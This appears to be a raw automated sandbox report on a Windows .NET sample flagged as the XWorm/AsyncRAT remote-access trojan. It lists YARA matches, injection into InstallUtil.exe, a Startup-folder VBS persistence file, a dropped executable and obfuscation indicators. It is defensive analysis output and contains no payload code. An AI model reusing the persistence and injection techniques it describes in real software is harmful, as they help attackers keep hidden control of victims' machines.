                Source: zXtG0a5Gt0.exe, 00000001.00000002.1368848994.0000000005EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGwdziqmhz.dll" vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003892000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRAw.exe4 vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exeBinary or memory string: OriginalFilenamereff.exe, vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: zXtG0a5Gt0.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: Ticks.exe.1.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@4/3@1/1
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:64:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\hvvodBAOHulLeYa8
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\786a8cee-80ff-42ec-ba01-761230293945Jump to behavior
                Source: zXtG0a5Gt0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: zXtG0a5Gt0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: zXtG0a5Gt0.exeVirustotal: Detection: 61%
                Source: zXtG0a5Gt0.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile read: C:\Users\user\Desktop\zXtG0a5Gt0.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\zXtG0a5Gt0.exe "C:\Users\user\Desktop\zXtG0a5Gt0.exe"
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 908
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: zXtG0a5Gt0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: zXtG0a5Gt0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\System.pdbrsio source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.0000000001062000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zXtG0a5Gt0.exe, 00000001.00000002.1371129170.0000000006460000.00000004.08000000.00040000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003842000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003892000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ((.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdbl, P source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb4 source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zXtG0a5Gt0.exe, 00000001.00000002.1371129170.0000000006460000.00000004.08000000.00040000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003842000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003892000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.000000000107D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbQ source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: zXtG0a5Gt0.exe, -.cs.Net Code: _0001 System.AppDomain.Load(byte[])
                Source: Ticks.exe.1.dr, -.cs.Net Code: _0001 System.AppDomain.Load(byte[])
                Source: 1.2.zXtG0a5Gt0.exe.61b0000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 1.2.zXtG0a5Gt0.exe.61b0000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 1.2.zXtG0a5Gt0.exe.61b0000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 1.2.zXtG0a5Gt0.exe.61b0000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 1.2.zXtG0a5Gt0.exe.61b0000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 1.2.zXtG0a5Gt0.exe.3842640.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 1.2.zXtG0a5Gt0.exe.3976628.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 1.2.zXtG0a5Gt0.exe.3976628.2.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 1.2.zXtG0a5Gt0.exe.3976628.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 1.2.zXtG0a5Gt0.exe.3976628.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 1.2.zXtG0a5Gt0.exe.3976628.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 1.2.zXtG0a5Gt0.exe.6460000.12.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.6150000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.6150000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.37629f1.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.3782a11.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.370b3a0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1370075880.0000000006150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1365290075.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: zXtG0a5Gt0.exe PID: 7912, type: MEMORYSTR
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F9760 push es; iretd 1_2_055F976C
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F7392 pushad ; ret 1_2_055F7399
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F8E78 pushfd ; iretd 1_2_055F8E79
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F72E8 push eax; ret 1_2_055F72E9
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06074F08 pushfd ; ret 1_2_06074F15
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06120C3B push esp; iretd 1_2_06120C41
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06120C38 pushad ; iretd 1_2_06120C39
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0614688D push es; iretd 1_2_061468B8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06213781 push es; iretd 1_2_06213783
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06213EAF push es; ret 1_2_06213EB0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06212FD2 push ebx; iretd 1_2_06212FD6
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06213D33 push es; ret 1_2_06213D78
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_065136B7 push esp; iretd 1_2_065136BA
                Source: 1.2.zXtG0a5Gt0.exe.5ef0000.8.raw.unpack, r8buFRUnwQgGdrHW4u7.csHigh entropy of concatenated method names: 'DppULnsx75', 'oEGUHUe4OJ', 'IbLUibWM2C', 'A2LUfKVKe6', 'urHUd3EF1E', 'aUgUZ4wpL5', 'HFZU1m9EY5', 'ovCUQtNL1F', 'BnBUotZf3d', 'wB2U4lOhSy'
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile created: C:\Users\user\AppData\Roaming\Ticks.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbsJump to dropped file
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbsJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbsJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
